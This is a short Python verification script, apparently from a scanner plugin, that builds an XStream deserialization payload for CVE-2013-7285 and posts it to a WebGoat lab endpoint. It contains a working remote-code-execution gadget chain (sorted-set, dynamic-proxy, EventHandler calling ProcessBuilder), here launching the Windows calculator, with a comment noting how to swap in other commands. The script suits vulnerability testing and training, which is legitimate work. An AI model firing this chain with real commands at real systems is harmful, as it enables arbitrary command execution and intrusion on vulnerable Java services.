#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import urllib.parse
def verify(arg,**kwargs):
    result = {
        'text':''
    }
    #构建用于验证CVE-2013-7285漏洞的XML序列化对象
    xmlSort = '<sorted-set>'#标签对应java.util.TreeSet类
    #标签对应XStream的DynamicProxyConverter,其实就是使用java的动态代理功能
    xmldProxy = '<dynamic-proxy>'
    #构建反序列化漏洞调用链,此验证代码适用windows系统
    #如果是linux系统,需要替换command中的命令
    xmlCallChain = '''
    <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                 <command>
                    <string>cmd</string>
                    <string>/c</string>
                    <string>calc</string>
                 </command>
            </target>
            <action>start</action>
        </handler>
    '''
    xmldProxye = "</dynamic-proxy>"
    xmlSorte = "</sorted-set>"
    crlf = "\r\n"

    payload = xmlSort + crlf + xmldProxy + crlf + xmlCallChain + crlf + xmldProxye + xmlSorte

    data = {
        'payload':payload
    }
    data = urllib.parse.urlencode(data)
    path = "/WebGoat/VulnerableComponents/attack1"
    urlPath = arg['url'] + path
    headers = arg['requests']['headers']
    headers["Content-Type"] ="application/x-www-form-urlencoded; charset=UTF-8"
    response = requests.post(url=urlPath,headers=headers,data=data)
    result['text'] = response.text
    return result 